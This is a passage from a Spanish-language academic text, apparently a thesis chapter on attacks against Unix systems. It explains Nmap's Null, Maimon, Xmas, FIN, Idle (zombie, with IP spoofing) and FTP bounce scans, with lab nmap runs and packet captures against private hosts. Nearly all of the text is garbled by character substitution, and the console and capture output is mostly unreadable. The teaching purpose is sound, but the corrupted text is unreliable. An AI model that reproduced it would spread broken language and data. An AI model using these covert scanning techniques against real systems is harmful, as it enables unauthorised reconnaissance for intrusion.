'a que "or eje "lo stos /iltran los "aquetes s8lo con el /lag ,K@ activado ' que no cu "la cierta condici8n ;"or eje "lo# que el "uerto destino sea O.>H sin e bargo# al enviarle "aquetes F7@# dic$a regla no alcanza este "aquete# "or lo que es ruteado al destino. Co o "articularidad a las caracter)sticas descri"tas# en el Mai on scan# al enviarle un F7@_ACR a un $ost que ejecute algGn viejo stac6 FC!&7! ti"o B,5+0 o derivado% si el <,F de res"uesta contiene un FF: de ventana es enor al original# o el ta aBo a'or a cero# entonces el "uerto est abiertoS!<RU10T.

A continuaci8n ;Consola @ro. 5> "ueden verse las di/erentes ejecuciones sucesivas de estos cuatro ti"os de escaneo sobre el $ost *02.*JO...-.# que tiene el "uerto 22 abierto ' el resto cerrados ;no $a' ningGn /ireIall inter"onindose>. !or
+O :os /ireIalls o dis"ositivos de /iltrado de "aquetes bsica ente se categorizan en varios gru"os# de acuerdo a cun so/isticados son ' qu caracter)sticas "oseen% C statelessD o Csin estadoD# CstatefulD o Ccon estadoD# ' "or Glti o los de Cca"a de a"licaci8nD. Ler% $tt"%&&en.Ii6i"edia.org&Ii6i&FireIall +0 :a i "le entaci8n del stac6 FC!&7! de B,5 es la versi8n de re/erencia ' s e9tendida de los algorit os es"eci/icados "or los <FC ;aunque $a' otras># incluso $asta ,?s con arquitecturas di/erentes co o 4indoIs# la usan. :a versi8n actual ;vigente desde *00.> es la <eno FC! ' su versi8n "osterior# 1.1B,5(:ite. Ler% $tt"%&&es.Ii6i"edia.org&Ii6i&7 "le entacionesUdeUFC! Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. 10 de 22O

Ca")tulo 1. ( 1.-.Fi"os de !ort ,canning en @Ma"

brevedad s8lo se

uestra aqu) una Gnica ca"tura ;la @ro. O>H el resto ;@ros. 0 a **>

estn dis"onibles en el Ane9o B>. En las ca"turas de tr/ico "uede verse que justa ente# salvo "ara el "uerto abierto 22 ;donde no $a' res"uesta alguna># la res"uesta del $ost *02.*JO...-. es un <,F_ACR.
marcelo@saturno:~/src/nmap/bin$ ((4(54)0 u7o .;nmap - N 19(.16).0.30 -p

.tarting Nmap +.53 9 'ttp:;;in e!ure.org : at (00)-03-0+ 1(:+( #$.T 8ntere ting port on !i!"on 919(.16).0.30:: PO$T .T#T< .<$=8,< ((;t!p openFfi"tere7 ' (5;t!p !"o e7 mtp )0;t!p !"o e7 'ttp 3#, #77re : 00:0,:(9:<1:#(:(6 9=3>are: Nmap 7one: 1 8P a77re 91 'o t up: !anne7 in 1.5+1 e!on7 marcelo@saturno:~/src/nmap/bin$ u7o .;nmap - 3 19(.16).0.30 -p ((4(54)0 .tarting Nmap +.53 9 'ttp:;;in e!ure.org : at (00)-03-0+ 1(:+3 #$.T 8ntere ting port on !i!"on 919(.16).0.30:: PO$T .T#T< .<$=8,< ((;t!p !"o e7 ' (5;t!p !"o e7 mtp )0;t!p !"o e7 'ttp 3#, #77re : 00:0,:(9:<1:#(:(6 9=3>are: Nmap 7one: 1 8P a77re 91 'o t up: !anne7 in 0.393 e!on7 marcelo@saturno:~/src/nmap/bin$ u7o .;nmap - G 19(.16).0.30 -p (0-(( .tarting Nmap +.53 9 'ttp:;;in e!ure.org : at (00)-03-0+ 1(:++ #$.T 8ntere ting port on !i!"on 919(.16).0.30:: PO$T .T#T< .<$=8,< (0;t!p !"o e7 ftp-7ata (1;t!p !"o e7 ftp ((;t!p openFfi"tere7 ' 3#, #77re : 00:0,:(9:<1:#(:(6 9=3>are: Nmap 7one: 1 8P a77re 91 'o t up: !anne7 in 1.677 e!on7 marcelo@saturno:~/src/nmap/bin$ u7o .;nmap - B 19(.16).0.30 -p ((41104)0)0 .tarting Nmap +.53 9 'ttp:;;in e!ure.org : at (00)-03-0+ 1(:+5 #$.T 8ntere ting port on !i!"on 919(.16).0.30:: PO$T .T#T< .<$=8,< ((;t!p openFfi"tere7 ' 110;t!p !"o e7 pop3 )0)0;t!p !"o e7 'ttp-proDE 3#, #77re : 00:0,:(9:<1:#(:(6 9=3>are: Nmap 7one: 1 8P a77re 91 'o t up: marcelo@saturno:~/src/nmap/bin$ !anne7 in 1.5+3 e!on7

Consola 5% Escaneos @ull# Mai on# A as ' Fin al $ost *02.*JO...-. res"ectiva ente

Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. 5. de 22O

Ca")tulo 1. ( 1.-.Fi"os de !ort ,canning en @Ma"


Paquete Nro: 1 Tiempo: 0.000000 Origen: 00:17:31:96:5b:1f: -> De tino: ff:ff:ff:ff:ff:ff: Proto!o"o: #$P De !rip!i%n: &'o 'a 19(.16).0.30* Te"" 19(.16).0.( Paquete Nro: ( Tiempo: 0.000+31 Origen: 00:0!:(9:e1:a(:(6: -> De tino: 00:17:31:96:5b:1f: Proto!o"o: #$P De !rip!i%n: 19(.16).0.30 i at 00:0!:(9:e1:a(:(6 Paquete Nro: 3 Tiempo: 0.03(196 Origen: 19(.16).0.(:5+999 -> De tino: 19(.16).0.30:(5 Proto!o"o: T,P De !rip!i%n: 5+999 > (5 -0 .eq10 2en10 Paquete Nro: + Tiempo: 0.03(+37 Origen: 19(.16).0.30:(5 -> De tino: 19(.16).0.(:5+999 Proto!o"o: T,P De !rip!i%n: (5 > 5+999 -$.T4 #,50 .eq10 #!610 &in10 2en10 Paquete Nro: 5 Tiempo: 0.03(51) Origen: 19(.16).0.(:5+999 -> De tino: 19(.16).0.30:)0 Proto!o"o: T,P De !rip!i%n: 5+999 > )0 -0 .eq10 2en10 Paquete Nro: 6 Tiempo: 0.03(60+ Origen: 19(.16).0.30:)0 -> De tino: 19(.16).0.(:5+999 Proto!o"o: T,P De !rip!i%n: )0 > 5+999 -$.T4 #,50 .eq10 #!610 &in10 2en10 Paquete Nro: 7 Tiempo: 0.03(667 Origen: 19(.16).0.(:5+999 -> De tino: 19(.16).0.30:(( Proto!o"o: T,P De !rip!i%n: 5+999 > (( -0 .eq10 2en10 Paquete Nro: ) Tiempo: 1.1+799+ Origen: 19(.16).0.(:55000 -> De tino: 19(.16).0.30:(( Proto!o"o: T,P De !rip!i%n: 55000 > (( -0 .eq10 2en10

Ca"tura O% Ca"tura de un @ull ,can

1.-.+. 7dle ,can


El 7dle ,can "uede decirse que es bastante di/erente a los anteriores# dado que el "ort scanner no utiliza Gnica ente el $ost donde se est ejecutando "ara enviar "aquetes directa ente al destino# sino que se a"rovec$a de la e9istencia otro $ost inter edio ;Czo bieD># que debe estar inactivo en cuanto a

Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. 5* de 22O

Ca")tulo 1. ( 1.-.Fi"os de !ort ,canning en @Ma"

env)o&rece"ci8n de tr/icoO. ' es el que real ente actGa co o origen de los "aquetes de "rueba "ara el destino. ,i bien es un "roceso algo largo# "uede resu irse en los siguientes "asos# su"oniendo co o =ost A el origen# B el zo bie ' C el destino. 7. A co "rueba% a> :a "redictibilidad en la generaci8n del ca "o 75 de 7!O* de B ;7!(75 de a$ora en s>. Es decir# el "ort scanner en A c$equea que B utilice algGn algorit o "redecible ;nor al ente nG eros secuenciales> "ara identi/icar ;o C arcarD> los "aquetes 7!. Esto lo $ace envindole varios "aquetes ,K@_ACR "ara obtener <,Fs ' c$equear que los 7!(75 de las res"uestas son e/ectiva ente sucesivos ;o "redecibles al BD. b> Al enviarle dic$os "aquetes ,K@_ACR ' recibir los res"ectivos <,F desde B# A ta bin veri/ica que B est sin tr/ico# 'a que de otra anera# los 7!(75s no ser)an secuenciales. +. ,i B "asa las "ruebas que $ace A# entonces B es adecuado "ara utilizar co o Qo bie ' se guarda el Glti o 7!(75 recibido. ;. El "ort scanner en A le env)a directa ente a C "aquetes ,K@ $aciendo ,"oo/ing de la 7!O- de B. 5ic$os "aquetes enviados son# en realidad# el escaneo de "uertos real ;es un ,'n ,can nor al# van dirigidos a los "uertos que a A le interesa saber su estado>H la di/erencia se encuentra en que A sabe que al $aber $ec$o s"oo/ing de la 7! de B# las res"uestas de C no sern devueltas a A# sino que irn destinadas a B ;"aso 1>. <. C# al recibir un "aquete con ,K@ Cdesde BD ;aunque en realidad sea A># va co "ortarse co o un rece"tor clsico de un ,K@ ,can% si el "uerto
O. 5e aqu) "roviene el no bre de 6dle Scan# es decir# idle signi/ica CinactivoD en ingls. O* El Ca "o 75 del encabezado 7! es utilizado "ara /rag entar los datagra as en algGn "unto de la co unicaci8n ' reensa blarlos en otro. ,e utilizan nG eros secuenciales "ara relacionar un Gnico seg ento de Ca"a 1 en varios datagra as 7! de Ca"a -. Ler SFC!&7!U7llT# Ca". **.5. O2 !ara s in/or aci8n sobre el algorit o que utiliza @ a" "ara averiguar si el 7!(75 es odi/ica el ca "o corres"ondiente a la direcci8n 7! de "redecible# ver% $tt"%&&n a".org&osdetect&osdetect( et$ods.$t lcosdetect(ti O- !ara $cer s"oo/ing de una 7!# @ a" ?rigen del encabezado de los "aquetes que env)a. Ler S7!U,!??FT. Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. 52 de 22O

enos O2>.

Este "roceso "uede lla rselo co o C"regunta nG ero de 7!(75 de

Ca")tulo 1. ( 1.-.Fi"os de !ort ,canning en @Ma"

destino est abierto# intentar iniciar la cone9i8n envindole a B un ,K@_ACR. ,i el "uerto est cerrado# le devolver un <,F_ACR. . B# al no $aber iniciado cone9i8n alguna con C ' recibir un "aquete "roveniente de l# to a uno de los dos ca inos% a> ,i recibe un ,K@_ACR desde C ;'a que el "uerto en C est abierto># "ara B esto no tiene sentidoH in ediata ente le env)a a C un <,F# incrementando el I4.ID en uno ;o generando un valor nuevo "redecible "or A>. C con esto cierra la cone9i8n alf'open ;C edia abiertaD>. b> ,i recibe un <,F_ACR ;'a que el "uerto en C est cerrado># "ara B esto es tr/ico CnuloD# es decir# ignora el "aquete. #. :uego de unos instantes de de ora# A vuelve a C"reguntarD el nG ero actual de 7!(75 de B# ' nueva ente# $a' dos alternativas% a> El 7!(75 se incre ent8 en uno% entonces el "uerto en C est abierto "ara B. b> El 7!(75 no se incre ent8% entonces el "uerto en C est cerrado o /iltrado. Fjemplo ! /aptura de un Idle Acan%
marcelo@saturno:~/src/nmap/bin$ u7o nmap - 8 19(.16).0.30 19(.16).0.100 -p ((4(5 &#$N8NH: 3anE peop"e u e -P0 >;87"e !an to pre@ent ping from t'eir true 8P. On t'e ot'er 'an74 timing info Nmap gain from ping !an a""o> for fa ter4 more re"iab"e !an . .tarting Nmap +.(0 9 'ttp:;;in e!ure.org : at (00)-03-06 13:(3 #$.T Idlescan using zombie 192.168.0. 0 !192.168.0. 0:80"# $lass: Incremental 8ntere ting port on t unami 919(.16).0.100:: PO$T .T#T< .<$=8,< ((;t!p !"o e7Ffi"tere7 ' (5;t!p open mtp 3#, #77re : 00:0,:(9:90:(#:(D 9=3>are: Nmap fini 'e7: 1 8P a77re 91 'o t up: marcelo@saturno:~/src/nmap/bin$ !anne7 in 3.+)+ e!on7

Consola J% 7dle ,can a *02.*JO...*. usando co o Qo bie a *02.*JO...-.

En la consola J se

uestra una ejecuci8n t)"ica de @ a" corriendo un 7dle

,canH en este caso "ara veri/icar si los "uertos 22 ' 25 estn abiertos en el $ost *02.*JO...*.. utilizando co o Qo bie a *02.*JO...-.. !ara "oder co "render la ca"tura de tr/ico# $a' que recordar que el =ost A tiene la MAC address
Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. 5- de 22O

Ca")tulo 1. ( 1.-.Fi"os de !ort ,canning en @Ma"

..%*+%-*%0J%5b%*/# el =ost B la MAC ..%.c%20%e*%a2%2J ' el =ost C la MAC ..%.c%20%0.%2a%2d. <elacionar la 7! con cada $ost "uede ser engaBoso# 'a que A utilizar las tres direcciones 7! de /or a indistinta.
... Paquete nro. 3 - Tiempo 0.0(9939 3a! Origen: 00:17:31:96:5b:1f !%" &' 3a! De tino: 00:0!:(9:e1:a(:(6 !(" 8P Origen: 19(.16).0.( -> 19(.16).0.30 8P ?ea7er: =er ion:+2 2en:++ 8D:7))( Brag:02 TT2:37 9...: T,P ?ea7er: .Port:+617+ )*ort:80 .eqN:13(0+0++1 #!6N:(303113(51 +lags:0,12!-%" &n7:(0+) 9...: De !rip!ion: <t'er ; 8P ; T,P 19(.16).0.(:+617+ > 19(.16).0.30:>>> .# Paquete nro. + - Tiempo 0.03193( 3a! Origen: 00:0!:(9:e1:a(:(6 !(" -> 3a! De tino: 00:17:31:96:5b:1f !%" 8P Origen: 19(.16).0.30 -> 19(.16).0.( 8P ?ea7er: =er ion:+2 2en:+0 I):81 Brag:02 TT2:6+ 9...: T,P ?ea7er: -*ort:80 DPort:+617+ .eqN:(303113(51 #!6N:0 +lags:0,0.!/" &n7:0 9...: De !rip!ion: <t'er ; 8P ; T,P 19(.16).0.30:>>> > 19(.16).0.(:+617+ $ Paquete nro. 5 - Tiempo 0.065571 3a! Origen: 00:17:31:96:5b:1f !%" &' 3a! De tino: 00:0!:(9:e1:a(:(6 !(" 8P Origen: 19(.16).0.( -> 19(.16).0.30 8P ?ea7er: =er ion:+2 2en:++ 8D:3))03 Brag:02 TT2:+0 9...: T,P ?ea7er: .Port:+6175 )*ort:80 .eqN:13(0+0++( #!6N:(303113(51 +lags:0,12!-%" &n7:10(+ 9...: De !rip!ion: <t'er ; 8P ; T,P 19(.16).0.(:+6175 > 19(.16).0.30:>>> .# Paquete nro. 6 - Tiempo 0.065)0+ 3a! Origen: 00:0!:(9:e1:a(:(6 !(" &' 3a! De tino: 00:17:31:96:5b:1f !%" 8P Origen: 19(.16).0.30 -> 19(.16).0.( 8P ?ea7er: =er ion:+2 2en:+0 I):82 Brag:02 TT2:6+ 9...: T,P ?ea7er: -*ort:80 DPort:+6175 .eqN:(303113(51 #!6N:0 +lags:0,0.!/" &n7:0 9...: De !rip!ion: <t'er ; 8P ; T,P 19(.16).0.30:>>> > 19(.16).0.(:+6175 $ ... Paquete nro. 15 - Tiempo 0.19++50 3a! Origen: 00:17:31:96:5b:1f !%" &' 3a! De tino: 00:0!:(9:e1:a(:(6 !(" 8P Origen: 192.168.0.100 &' 192.168.0. 0 8P ?ea7er: =er ion:+2 2en:++ 8D:1+395 Brag:02 TT2:5( 9...: T,P ?ea7er: .Port:+6173 DPort:)0 .eqN:13(0+0++1 #!6N:(303113(51 +lags:0,12!-%" &n7:10(+ 9...: De !rip!ion: <t'er ; 8P ; T,P 19(.16).0.100:+6173 > 19(.16).0.30:>>> .# Paquete nro. 16 - Tiempo 0.19+6(0 3a! Origen: 00:0!:(9:e1:a(:(6 !(" &' 3a! De tino: 00:0!:(9:90:(a:(7 !$" 8P Origen: 192.168.0. 0 &' 192.168.0.100 8P ?ea7er: =er ion:+2 2en:+0 I):80 Brag:02 TT2:6+ 9...: T,P ?ea7er: .Port:)0 DPort:+6173 .eqN:(303113(51 #!6N:0 +lags:0,0.!/" &n7:0 9...: De !rip!ion: <t'er ; 8P ; T,P 19(.16).0.30:>>> > 19(.16).0.100:+6173 $ ...

Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. 51 de 22O

Ca")tulo 1. ( 1.-.Fi"os de !ort ,canning en @Ma"

Paquete nro. (7 - Tiempo 0.653+67 3a! Origen: 00:17:31:96:5b:1f !%" &' 3a! De tino: 00:0!:(9:e1:a(:(6 !(" 8P Origen: 192.168.0.2 &' 192.168.0. 0 8P ?ea7er: =er ion:+2 2en:++ 8D:+6(96 Brag:02 TT2:+0 9...: T,P ?ea7er: .Port:+6330 DPort:)0 .eqN:()70071(9( #!6N:397)13361+ +lags:0,12!-%" &n7:10(+ 9...: De !rip!ion: <t'er ; 8P ; T,P 19(.16).0.(:+6330 > 19(.16).0.30:>>> .# Paquete nro. () - Tiempo 0.653739 3a! Origen: 00:0!:(9:e1:a(:(6 !(" &' 3a! De tino: 00:17:31:96:5b:1f !%" 8P Origen: 192.168.0. 0 &' 192.168.0.2 8P ?ea7er: =er ion:+2 2en:+0 I):91 Brag:02 TT2:6+ 9...: T,P ?ea7er: .Port:)0 DPort:+6330 .eqN:397)13361+ #!6N:0 +lags:0,0.!/" &n7:0 9...: De !rip!ion: <t'er ; 8P ; T,P 19(.16).0.30:>>> > 19(.16).0.(:+6330 $

Ca"tura 0% C$equeo de ,ecuencialidad% FC! !ing ;,K@_ACR> de A en busca de <,F de B

En la Ca"tura 0 "uede verse en acci8n el "unto *% A "ri ero env)a insistente ente ;varias veces> "aquetes FC! con ,K@_ACR desde su 7!# tratando de deter inar si del <,F de res"uesta# el 75 del encabezado 7! es secuencial. Co o se "uede ver# el 75 "ri ero es O* ' luego O2 ;' as) sucesiva ente "ara cada C"reguntaD# "aquetes - al J>. :uego A $ace s"oo/ing de la 7! de C ' ta bin env)a "ruebas "ara averiguar si la 75 de los <,F siguen siendo secuenciales ;!aquete *5>. !ero co o estas res"uestas son devueltas al =ost C real ;!aquete *J># la Gnica anera de que A co "ruebe la su"osici8n de que los 75 se

Paquete nro. (9 - Tiempo 0.653)51 3a! Origen: 00:17:31:96:5b:1f !%" &' 3a! De tino: 00:0!:(9:90:(a:(7 !$" 8P Origen: 192.168.0. 0 &' 192.168.0.100 8P ?ea7er: =er ion:+2 2en:++ 8D:335(0 Brag:02 TT2:5( 9...: T,P ?ea7er: .Port:)0 )*ort:21 .eqN:(30079163) #!6N:0 +lags:0,02!-" &n7:10(+ 9...: De !rip!ion: <t'er ; 8P ; T,P 19(.16).0.30:>>> > 19(.16).0.100: mtp . Paquete nro. 30 - Tiempo 0.65+0+9 3a! Origen: 00:0!:(9:90:(a:(7 !$" &' 3a! De tino: 00:0!:(9:e1:a(:(6 !(" 8P Origen: 19(.16).0.100 -> 19(.16).0.30 8P ?ea7er: =er ion:+2 2en:++ 8D:(5 Brag:02 TT2:6+ 9...: T,P ?ea7er: -*ort:21 DPort:)0 .eqN:(1599+6)01 #!6N:(300791639 +lags:0,12!-%" &n7:30660 9...: De !rip!ion: <t'er ; 8P ; T,P 19(.16).0.100: mtp > 19(.16).0.30:>>> .# ... Paquete nro. 3( - Tiempo 0.65+33+ 3a! Origen: 00:0!:(9:e1:a(:(6 !(" &' 3a! De tino: 00:0!:(9:90:(a:(7 !$" 8P Origen: 19(.16).0.30 -> 19(.16).0.100 8P ?ea7er: =er ion:+2 2en:+0 I):92 Brag:02 TT2:6+ 9...: T,P ?ea7er: .Port:)0 )*ort:21 .eqN:(300791639 #!6N:0 +lags:0,0.!/" &n7:0 9...: De !rip!ion: <t'er ; 8P ; T,P 19(.16).0.30:>>> > 19(.16).0.100: mtp $ ...

Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. 55 de 22O

Ca")tulo 1. ( 1.-.Fi"os de !ort ,canning en @Ma"

incre entaron secuencial ente es volviendo a C"reguntarD co o al co ienzo ;!aquetes 2+ ' 2O>. All) /inaliz8 la eta"a *# ' A CguardaD el Glti o 7!(75 0* antes de $acer el escaneo en s).
Paquete nro. 3+ - Tiempo 0.705565 3a! Origen: 00:17:31:96:5b:1f !%" &' 3a! De tino: 00:0!:(9:e1:a(:(6 !(" 8P Origen: 19(.16).0.( -> 19(.16).0.30 8P ?ea7er: =er ion:+2 2en:++ 8D:15757 Brag:02 TT2:59 9...: T,P ?ea7er: .Port:+6(+) DPort:)0 .eqN:()7007179( #!6N:397)13361+ +lags:0,12!-%" &n7:+096 9...: De !rip!ion: <t'er ; 8P ; T,P 19(.16).0.(:+6(+) > 19(.16).0.30:>>> .# Paquete nro. 35 - Tiempo 0.705)51 3a! Origen: 00:0!:(9:e1:a(:(6 !(" &' 3a! De tino: 00:17:31:96:5b:1f !%" 8P Origen: 19(.16).0.30 -> 19(.16).0.( 8P ?ea7er: =er ion:+2 2en:+0 I):9 Brag:02 TT2:6+ 9...: T,P ?ea7er: .Port:)0 DPort:+6(+) .eqN:397)13361+ #!6N:0 +lags:0,0.!/" &n7:0 9...: De !rip!ion: <t'er ; 8P ; T,P 19(.16).0.30:>>> > 19(.16).0.(:+6(+) $

Ca"tura *.% Ejecuci8n del 7dle ,can en s)# dado que el "uerto 25 est abierto

:uego# A realiza lo siguiente "ara el "ri er "uerto a escanear ;el 25>%

Enviar el escaneo de "uertos a C C intiendoD sobre su direcci8n 7! ;aunque se lo "uede CdescubrirD en la ca"tura "or su direcci8n MAC>. ;20> C# co o tiene el "uerto 25 abierto# env)a el ,K@_ACR a B ;-.>. B# co o en ningGn o ento inici8 ninguna cone9i8n# env)a un <,F a C e incrementa su I4.ID a L+ ;-2>.

A vuelve a C"reguntarD a B "or su 7!(75H co o el <,F contiene el 75 0-# A sa(e que el puerto + en / est a(ierto ;'a que si $ubo un 7!(75 02# /ue el <,F que B le envi8 a C $ace un instante>.

Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. 5J de 22O

Ca")tulo 1. ( 1.-.Fi"os de !ort ,canning en @Ma"

Paquete nro. 36 - Tiempo 0.7059+) 3a! Origen: 00:17:31:96:5b:1f !%" &' 3a! De tino: 00:0!:(9:90:(a:(7 !$" 8P Origen: 192.168.0. 0 &' 192.168.0.100 8P ?ea7er: =er ion:+2 2en:++ 8D:15305 Brag:02 TT2:+0 9...: T,P ?ea7er: .Port:)0 )*ort:22 .eqN:(30079163) #!6N:0 +lags:0,02!-" &n7:10(+ 9...: De !rip!ion: <t'er ; 8P ; T,P 19(.16).0.30:>>> > 19(.16).0.100: ' . Paquete nro. 37 - Tiempo 0.7060)7 3a! Origen: 00:0!:(9:90:(a:(7 !$" &' 3a! De tino: 00:0!:(9:e1:a(:(6 !(" 8P Origen: 19(.16).0.100 -> 19(.16).0.30 8P ?ea7er: =er ion:+2 2en:+0 8D:(6 Brag:02 TT2:(55 9...: T,P ?ea7er: -*ort:22 DPort:)0 .eqN:0 #!6N:(300791639 +lags:0,1.!/%" &n7:0 9...: De !rip!ion: <t'er ; 8P ; T,P 19(.16).0.100: ' > 19(.16).0.30:>>> $# ... Paquete nro. 39 - Tiempo 0.757+75 3a! Origen: 00:17:31:96:5b:1f !%" &' 3a! De tino: 00:0!:(9:e1:a(:(6 !(" 8P Origen: 19(.16).0.( -> 19(.16).0.30 8P ?ea7er: =er ion:+2 2en:++ 8D:13500 Brag:02 TT2:56 9...: T,P ?ea7er: .Port:+6376 DPort:)0 .eqN:()7007((9( #!6N:397)13361+ +lags:0,12!-%" &n7:10(+ 9...: De !rip!ion: <t'er ; 8P ; T,P 19(.16).0.(:+6376 > 19(.16).0.30:>>> .# Paquete nro. +0 - Tiempo 0.757751 3a! Origen: 00:0!:(9:e1:a(:(6 !(" -> 3a! De tino: 00:17:31:96:5b:1f !%" 8P Origen: 19(.16).0.30 -> 19(.16).0.( 8P ?ea7er: =er ion:+2 2en:+0 I):9. Brag:02 TT2:6+ 9...: T,P ?ea7er: .Port:)0 DPort:+6376 .eqN:397)13361+ #!6N:0 +lags:0,0.!/" &n7:0 9...: De !rip!ion: <t'er ; 8P ; T,P 19(.16).0.30:>>> > 19(.16).0.(:+6376 $

Ca"tura **% 7dle ,can% El "uerto 22 en C est Cerrado

!ara el Glti o "uerto a escanear en C ;el 22>%

A vuelve a enviar un "aquete ,K@ al "uerto 22 de C C entirosoD con la 7! origen de B ;-J>. Co o el "uerto en C est cerrado# env)a un <,F_ACR a B ;-+>. B no $ace nada# descarta este "aquete. A vuelve a C"reguntarD "or el 7!(75. El 7!(75 no se incre ent8 ;es 01># "or lo que A asu e que B no env)o ningGn <,F luego del "aquete -J. 4or lo tanto% A asume que el puerto ++ en / est cerrado.O1

Bentajas ! Desventajas del Idle Acan @ a" en realidad generaliza en /or a "oco 8"ti a este "roceso "ara varios "uertos# "ero de todas aneras lo ejora ;se co "orta en /or a "arecida a una
s i "ortantes. El O1 ,i bien en el Ane9o B est detallada toda la ca"tura# estos son los "aquetes is os. Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. 5+ de 22O

resto son nuevos intentos ' "ruebas que realiza el @ a"# "ero los resultados siguen siendo los

Ca")tulo 1. ( 1.-.Fi"os de !ort ,canning en @Ma"

bGsqueda binaria recursiva>. 2na de las ventajas es que ni C ni su ad inistrador se enteran en ningGn o ento que el escaneo "rovino en realidad de A. ?tra es que A "uede detectar relaciones Cde con/ianzaD entre B ' CH es decir# si C tiene reglas di/erentes "ara B que lo $acen es"ecial ;"or eje "lo# le "er ite "asar cierto tr/ico># A "uede detectarlo. Entre las Clara ente# a'ores desventajas# est la de encontrar un Qo bie adecuado. s all de que B debe utilizar un ,iste a ?"erativo que asigne 7!(

75s "redecibles "ara todo el tr/ico# B debe "oseer algGn "uerto sin /iltrar "ara que A "ueda obtener <,Fs. Fa bin "uede co "licar el tr/ico que tenga B en ese o ento# co o ta bin la cantidad de "aquetes que es necesario interca biar# con el consiguiente consu o de anc$o de banda ' "rdida de tie "o $asta obtener un resultado. !ara s detalles de este escaneo# ver S,@CU75:ET ' S@MA!U75:ET.

1.-.O. FF! Bounce ,can


Este ti"o de escaneo a"rovec$a una vieja vulnerabilidad de los servidores FF! al i "le entar lo establecido "or el <FC 050 O5# que es quien de/ine el "rotocolo FF!. En dic$a es"eci/icaci8n# se "er ite un uso alternativo del co ando !?<FOJ# con el objetivo de que un servidor FF! env)e arc$ivos "ro"ios o in/or aci8n a otro servidor FF! distinto al cliente original. =o' en d)a esto co Gn ente se lla a FA!O+. ,in e bargo# en este ti"o de escaneo se a"rovec$a de esta /uncionalidad "ara "edirle al ,ervidor FF! que se conecte a la 7! ' "uerto del objetivo# indistinta ente si es un FF! ,erver o noH en realidad# el <FC ;' los servidores FF! vulnerables> no i "iden que sea cualquier 7! ' "uerto ;aqu) reside el origen de la vulnerabilidad>. ,i la cone9i8n es e9itosa# el servidor FF! lo in/or a al cliente FF! ;el "ort
O5 Enlace al <FC 050 del "rotocolo FF!% $tt"%&&tools.iet/.org&$t l&r/c050# "gina 0. OJ El uso tradicional del co ando !?<F es "ara iniciar una cone9i8n de datos FF! en lo que se lla a CModo ActivoD con el cliente. =o' en d)a# "or ser re"resenta es el !A,L. O+ FA! ;File eFc ange Protocol ' !rotocolo de interca bio de Arc$ivos> Es una "er ite que un cliente le ordene a un servidor FF! enviar un arc$ivo ;o datos> a otro servidor directa ente entre ellos# sin que intervenga el etodolog)a que s genrica ente# s "rctico en la con/iguraci8n de /ireIalls# se usa e9tensiva ente "ara esto el CModo !asivoD# ' el co ando FF! que lo

is o cliente.

Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. 5O de 22O

Ca")tulo 1. ( 1.-.Fi"os de !ort ,canning en @Ma"

scanner># ' ste

arca el "uerto co o abierto. En caso contrario el servidor FF!

ta bin lo in/or a ;con un error> que el "ort scanner reconoce# viendo el "uerto del destino co o cerrado. 5ado un esque a si ilar al 7dle ,can anterior ;donde A es el $ost que ejecuta el "ort scanner# B es el ,ervidor FF! ' C el equi"o objetivo># la secuencia de ataque t)"ica es% *. El "ort scanner en A se conecta al FF! ,erver en B. 2. A le env)a un co ando !?<F a B de anera que se conecte a C. ensaje de ?R. -. ,i el FF! en B "er ite la ejecuci8n del co ando !?<F con los "ar etros que se le "asaron# devuelve un co ando 1. :legado este "unto# el "ort scanner usual ente "ide la ejecuci8n del s co Gn del "rotocolo FF!% :7,FH esto es s8lo "ara que el servidor FF! en B e/ectiva ente se conecte al objetivo C e intente enviar un listado de arc$ivos del directorio ;B su"one que en esa 7! ' "uerto $a' otro FF! ,erver>. 5. ,i B tiene 9ito en la cone9i8n ;$ubo un t ree'.a1 ands ake entre B ' C># env)a "or el canal FF! establecido "revia ente un A identi/ica
OO

ensaje de ?R que

' le "er ite

arcar el "uerto co o abierto. ensaje de error

J. ,i B no tiene 9ito en la cone9i8n ;al ,K@ de B le sigui8 un <,F_ACR de C o un ti eout "orque el "uerto est /iltrado># B env)a un "or la cone9i8n FF! entre A ' B# ' el "ort scanner cerrado. arca el "uerto co o

OO En el "rotocolo FF!# al igual que en el "rotocolo =FF!# a un co ando del cliente le sigue una res"uesta del servidorH dic$as res"uestas estn de/inidas en los <FC ' estn "recedidas "or un c8digo de ensaje ;un nG ero># ade s del ensaje en /or ato te9to ;'a que en los inicios de a'ores a 2.. son de C?RD# los internet un cliente "od)a ser un usuario $u ano>. :os c8digos

a'ores a 1.. son de CErrorD ' as) sucesiva ente. Ler S47R7UFF!CT. Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. 50 de 22O

Ca")tulo 1. ( 1.-.Fi"os de !ort ,canning en @Ma"


marcelo@saturno:~/src/nmap/bin$ u7o .;nmap -b mar!e"o:mar!epa I19(.16).0.30 19(.16).0.100 -p ((4)0 ?int: if Eour boun!e !an target 'o t arenJt rea!'ab"e from 'ere4 remember to u e -PN o >e 7onJt trE an7 ping t'em prior to t'e !an .tarting Nmap +.53 9 'ttp:;;in e!ure.org : at (00)-03-06 1):37 #$.T 8ntere ting port on t unami 919(.16).0.100:: PO$T .T#T< .<$=8,< ((;t!p !"o e7 ' )0;t!p open 'ttp 3#, #77re : 00:0,:(9:90:(#:(D 9=3>are: Nmap 7one: 1 8P a77re 91 'o t up: marcelo@saturno:~/src/nmap/bin$ !anne7 in 1+.507 e!on7

Consola +% FF! Bounce ,can a *02.*JO...*.. usando el FF! ,erver en *02.*JO...-.


